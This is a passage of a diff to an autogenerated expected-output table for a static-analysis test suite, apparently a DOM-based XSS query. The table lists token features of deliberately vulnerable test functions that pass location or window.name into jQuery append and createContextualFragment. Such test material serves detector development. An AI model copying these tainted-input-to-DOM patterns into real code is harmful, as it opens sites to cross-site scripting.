+| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:20 | $("body").append | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:20 | $("body").append | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:20 | $("body").append | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:20 | $("body").append | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:30 | $("body ... cation) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:30 | $("body ... cation) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:30 | $("body ... cation) | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:30 | $("body ... cation) | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:30 | $("body ... cation) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:30 | exceptional return of $("body ... cation) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:30 | exceptional return of $("body ... cation) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:30 | exceptional return of $("body ... cation) | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:30 | exceptional return of $("body ... cation) | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:280:5:280:30 | exceptional return of $("body ... cation) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:280:7:280:12 | "body" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:280:7:280:12 | "body" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:280:7:280:12 | "body" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17139,6 +118935,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:280:7:280:12 | "body" | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | | autogenerated/Xss/DomBasedXss/tst.js:280:7:280:12 | "body" | enclosingFunctionName | jqueryLocation | | autogenerated/Xss/DomBasedXss/tst.js:280:7:280:12 | "body" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:280:15:280:20 | append | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:280:15:280:20 | append | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:280:15:280:20 | append | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:280:15:280:20 | append | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:280:15:280:20 | append | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:280:22:280:29 | location | CalleeFlexibleAccessPath | $().append | | autogenerated/Xss/DomBasedXss/tst.js:280:22:280:29 | location | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:280:22:280:29 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17146,6 +118947,152 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:280:22:280:29 | location | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | | autogenerated/Xss/DomBasedXss/tst.js:280:22:280:29 | location | enclosingFunctionName | jqueryLocation | | autogenerated/Xss/DomBasedXss/tst.js:280:22:280:29 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:284:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:284:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:284:0 | this | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:284:0 | this | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:284:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:290:1 | 'arguments' object of function testCreateContextualFragment | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:290:1 | 'arguments' object of function testCreateContextualFragment | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:290:1 | 'arguments' object of function testCreateContextualFragment | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:290:1 | 'arguments' object of function testCreateContextualFragment | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:290:1 | 'arguments' object of function testCreateContextualFragment | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:290:1 | exceptional return of function testCreateContextualFragment | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:290:1 | exceptional return of function testCreateContextualFragment | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:290:1 | exceptional return of function testCreateContextualFragment | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:290:1 | exceptional return of function testCreateContextualFragment | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:290:1 | exceptional return of function testCreateContextualFragment | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:290:1 | functio ... ent);\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:290:1 | functio ... ent);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:290:1 | functio ... ent);\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:290:1 | return of function testCreateContextualFragment | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:290:1 | return of function testCreateContextualFragment | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:290:1 | return of function testCreateContextualFragment | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:290:1 | return of function testCreateContextualFragment | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:284:1:290:1 | return of function testCreateContextualFragment | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:284:10:284:37 | testCre ... ragment | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:284:10:284:37 | testCre ... ragment | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:284:10:284:37 | testCre ... ragment | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:285:9:285:15 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:285:9:285:15 | tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:285:9:285:15 | tainted | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:285:9:285:15 | tainted | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:285:9:285:15 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:285:9:285:29 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:285:9:285:29 | tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:285:9:285:29 | tainted | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:285:9:285:29 | tainted | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:285:9:285:29 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:285:9:285:29 | tainted ... ow.name | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:285:9:285:29 | tainted ... ow.name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:285:9:285:29 | tainted ... ow.name | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:285:9:285:29 | tainted ... ow.name | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:285:9:285:29 | tainted ... ow.name | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:285:19:285:24 | window | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:285:19:285:24 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:285:19:285:24 | window | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:285:19:285:24 | window | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:285:19:285:24 | window | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:285:19:285:29 | window.name | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:285:19:285:29 | window.name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:285:19:285:29 | window.name | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:285:19:285:29 | window.name | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:285:19:285:29 | window.name | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:285:26:285:29 | name | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:285:26:285:29 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:285:26:285:29 | name | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:285:26:285:29 | name | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:285:26:285:29 | name | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:286:9:286:13 | range | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:286:9:286:13 | range | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:286:9:286:13 | range | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:286:9:286:13 | range | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:286:9:286:13 | range | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:286:9:286:38 | range | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:286:9:286:38 | range | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:286:9:286:38 | range | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:286:9:286:38 | range | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:286:9:286:38 | range | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:286:9:286:38 | range = ... Range() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:286:9:286:38 | range = ... Range() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:286:9:286:38 | range = ... Range() | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:286:9:286:38 | range = ... Range() | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:286:9:286:38 | range = ... Range() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:286:17:286:24 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:286:17:286:24 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:286:17:286:24 | document | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:286:17:286:24 | document | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:286:17:286:24 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:286:17:286:36 | document.createRange | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:286:17:286:36 | document.createRange | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:286:17:286:36 | document.createRange | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| 